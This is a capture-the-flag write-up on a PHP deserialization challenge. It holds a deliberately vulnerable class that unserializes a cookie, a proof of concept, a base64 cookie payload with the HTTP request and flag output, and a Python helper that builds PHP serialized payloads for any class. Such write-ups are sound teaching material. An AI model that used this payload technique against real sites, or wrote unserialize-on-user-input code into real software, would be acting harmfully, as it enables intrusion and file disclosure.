Source

<?php

// Challenge source (kept deliberately vulnerable as given): a class whose
// destructor calls a method that reads /flag when two properties match.
class Gemini
{
    var $id;
    var $user;

    public function __construct($id, $user)
    {
        $this->id = $id;
        $this->user = $user;
    }

    // Runs automatically when the object is destroyed, i.e. also for an
    // object that unserialize() created from attacker-controlled data.
    function __destruct()
    {
        printf("%s\n", __METHOD__);
        $this->login();
    }

    function login()
    {
        printf("%s\n", __METHOD__);
        // Strict comparison: both properties must be the *strings* "1317"
        // and "lutalica"; an integer 1317 would not pass.
        if ($this->id === "1317" and $this->user === "lutalica") {
            echo file_get_contents('/flag');
        }
    }
}

// The vulnerability: user-controlled cookie data passed straight to unserialize().
if (isset($_COOKIE['Gemini'])) {
    unserialize(base64_decode($_COOKIE['Gemini']));
} else {
    // Message reads: "The system has detected a vulnerability here; carry out an attack test"
    echo "系统检测发现该处漏洞,进行攻击测试\n";
}
?>

POC

<?php

// Local copy of the class with only the properties we need to control.
// __destruct/login are not needed here: PHP serializes property values,
// not methods, and the target's own class definition supplies the rest.
class Gemini
{
    var $id;
    var $user;

    public function __construct($id, $user)
    {
        $this->id = $id;
        $this->user = $user;
    }
}

// Values are passed as strings so that the target's === checks succeed.
echo base64_encode(serialize(new Gemini("1317", "lutalica")));

Tzo2OiJHZW1pbmkiOjI6e3M6MjoiaWQiO3M6NDoiMTMxNyI7czo0OiJ1c2VyIjtzOjg6Imx1dGFsaWNhIjt9

GET / HTTP/1.1
Host: localhost
Cookie: Gemini=Tzo2OiJHZW1pbmkiOjI6e3M6MjoiaWQiO3M6NDoiMTMxNyI7czo0OiJ1c2VyIjtzOjg6Imx1dGFsaWNhIjt9

Intercept the request, set the cookie to the payload, and the response is:

Gemini::__destruct
Gemini::login
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}

The payload decodes to O:6:"Gemini":2:{s:2:"id";s:4:"1317";s:4:"user";s:8:"lutalica";}. unserialize() rebuilds a Gemini object with those property values, and when the script ends and the object is destroyed, PHP invokes Gemini::__destruct, which calls login(). Because id and user were serialized as strings, the strict === comparison succeeds and file_get_contents('/flag') prints the contents of /flag.
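To build this kind of payload without a PHP interpreter, the following Python script (an added example, not part of the original writeup) implements the subset of PHP's serialize() format that the cookie needs: N/b/i/s scalars, arrays, and objects with public properties. It goes slightly beyond the writeup by handling arbitrary class names and property sets, and it shows the edge case the === check turns on: an id serialized as i:1317 instead of s:4:"1317" would be rejected by login(). The PhpObject class, php_serialize, gemini_payload and cookie_header are names chosen here; only the class name, property names and values come from the challenge.

```python
import base64
from typing import Any


class PhpObject:
    """A PHP object to serialize: class name plus ordered public properties.
    (Helper defined for this example; not part of the challenge code.)"""

    def __init__(self, class_name: str, props: dict):
        self.class_name = class_name
        self.props = props


def php_serialize(value: Any) -> str:
    """Emit PHP serialize() output for None, bool, int, str, list, dict, PhpObject.

    String lengths are byte lengths (PHP counts bytes, not characters), so
    non-ASCII values are measured after UTF-8 encoding.
    """
    if value is None:
        return "N;"
    if isinstance(value, bool):  # must precede int: bool is an int subclass
        return "b:%d;" % (1 if value else 0)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, (list, tuple)):
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (
            len(value.class_name.encode("utf-8")), value.class_name, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def gemini_payload(id_value: Any = "1317", user: str = "lutalica") -> str:
    """Serialize a Gemini object and base64-encode it for the Gemini cookie."""
    obj = PhpObject("Gemini", {"id": id_value, "user": user})
    return base64.b64encode(php_serialize(obj).encode("utf-8")).decode("ascii")


def cookie_header(payload_b64: str) -> str:
    """The header line to add to the intercepted request."""
    return "Cookie: Gemini=" + payload_b64


if __name__ == "__main__":
    print(php_serialize(PhpObject("Gemini", {"id": "1317", "user": "lutalica"})))
    print(cookie_header(gemini_payload()))
    # Same values typed as an integer: login()'s === would reject this one.
    print(php_serialize(PhpObject("Gemini", {"id": 1317, "user": "lutalica"})))
```

Running it prints the same base64 string as the PHP POC above, which is a useful cross-check before sending the cookie; the int variant is printed only to make the string-versus-integer distinction visible.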